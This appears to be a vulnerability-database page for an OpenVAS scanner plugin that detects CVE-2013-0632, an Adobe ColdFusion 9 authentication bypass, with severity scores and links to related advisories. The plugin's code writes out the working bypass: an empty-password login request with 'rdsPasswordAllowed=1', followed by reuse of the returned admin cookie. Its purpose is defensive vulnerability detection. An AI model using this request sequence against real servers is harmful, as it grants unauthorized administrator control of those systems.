Lucene search
Copyright (C) 2013 Greenbone AGOPENVAS:1361412562310103769HistoryAug 20, 2013 - 12:00 a.m.
Adobe ColdFusion Authentication Bypass Vulnerability
2013-08-2000:00:00
Copyright (C) 2013 Greenbone AG
plugins.openvas.org
21
6.6 Medium
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Adobe ColdFusion is prone to a remote authentication-bypass vulnerability.
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:adobe:coldfusion";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103769");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2013-0632");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_version("2023-07-27T05:05:08+0000");
script_name("Adobe ColdFusion Authentication Bypass Vulnerability");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/57330");
script_tag(name:"last_modification", value:"2023-07-27 05:05:08 +0000 (Thu, 27 Jul 2023)");
script_tag(name:"creation_date", value:"2013-08-20 12:36:50 +0200 (Tue, 20 Aug 2013)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_dependencies("gb_coldfusion_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("adobe/coldfusion/http/detected");
script_tag(name:"impact", value:"An attacker can exploit this issue to bypass certain authentication
processes and potentially allow an attacker to take control of the affected system.");
script_tag(name:"vuldetect", value:"Try to bypass authentication by sending some HTTP requests.");
script_tag(name:"insight", value:"Adobe ColdFusion versions 9.0, 9.0.1, and 9.0.2 do not properly check the
'rdsPasswordAllowed' field when accessing the Administrator API CFC that is used for logging in.");
script_tag(name:"solution", value:"Vendor updates are available.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"Adobe ColdFusion is prone to a remote authentication-bypass vulnerability.");
script_tag(name:"affected", value:"ColdFusion 9.0, 9.0.1, 9.0.2.
Note: This issue affects ColdFusion customers who do not have password
protection enabled or do not have a password set.");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!get_app_location(port:port, cpe:CPE, nofork:TRUE))
exit(0);
host = http_host_name(port:port);
req = 'POST /CFIDE/adminapi/administrator.cfc?method=login HTTP/1.1\r\n' +
'Host: ' + host + '\r\n' +
'Connection: close\r\n' +
'Content-Type: application/x-www-form-urlencoded\r\n' +
'Content-Length: 35\r\n' +
'\r\n' +
'adminpassword=&rdsPasswordAllowed=1';
result = http_send_recv(port:port, data:req, bodyonly:FALSE);
if("<wddxPacket" >!< result || "'true'" >!< result)
exit(0);
k = eregmatch(pattern:"CFAUTHORIZATION_cfadmin=([^;]+);", string:result);
if(isnull(k[1]))
exit(0);
req = 'GET /CFIDE/administrator/homepage.cfm HTTP/1.1\r\n' +
'Host: ' + host + '\r\n' +
'Connection: close\r\n' +
'Cookie: CFAUTHORIZATION_cfadmin=' + k[1] + '\r\n\r\n';
result = http_send_recv(port:port, data:req, bodyonly:FALSE);
if("<title>ColdFusion Administrator Home Page</title>" >< result &&
"Welcome to the ColdFusion Administrator" >< result) {
security_message(port:port);
exit(0);
}
exit(99);
Related
prion
prion
Authentication flaw
2013-01-17 00:55:00
zdt
zdt
Adobe ColdFusion 9 Administrative Login Bypass Vulnerability
2013-12-11 00:00:00
Adobe ColdFusion 9 Administrative Login Bypass Vulnerability
2013-08-21 00:00:00
exploitpack
exploitpack
Adobe ColdFusion 9 - Administrative Authentication Bypass
2013-08-21 00:00:00
packetstorm
packetstorm
Packet Storm Advisory 2013-0819-2 - Adobe ColdFusion 9 Administrative Login Bypass
2013-08-19 00:00:00
Adobe ColdFusion APSB13-03 Command Execution
2013-04-10 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Authentication Bypass (CVE-2013-0632)
2013-02-19 00:00:00
nessus
nessus
Adobe ColdFusion Authentication Bypass (APSB13-03)
2013-02-19 00:00:00
Adobe ColdFusion Multiple Vulnerabilities (APSB13-03) (credentialed check)
2013-05-21 00:00:00
cve
cve
CVE-2013-0632
2013-01-17 00:55:00
attackerkb
attackerkb
CVE-2013-0632
2013-01-17 00:00:00
seebug
seebug
Adobe ColdFusion 9 Administrative Login Bypass
2014-07-01 00:00:00
Adobe ColdFusion APSB13-03 Remote Exploit
2014-07-01 00:00:00
cisa_kev
cisa_kev
Adobe ColdFusion Authentication Bypass Vulnerability
2022-03-03 00:00:00
exploitdb
exploitdb
Adobe ColdFusion 9 - Administrative Authentication Bypass
2013-08-21 00:00:00
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)
2013-04-10 00:00:00
kitploit
kitploit
clusterd - Application Server Attack Toolkit
2017-09-25 21:04:00
securityvulns
securityvulns
Adobe ColdFusion multiple security vulnerabilities
2013-01-14 00:00:00
thn
thn
6.6 Medium
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Related for OPENVAS:1361412562310103769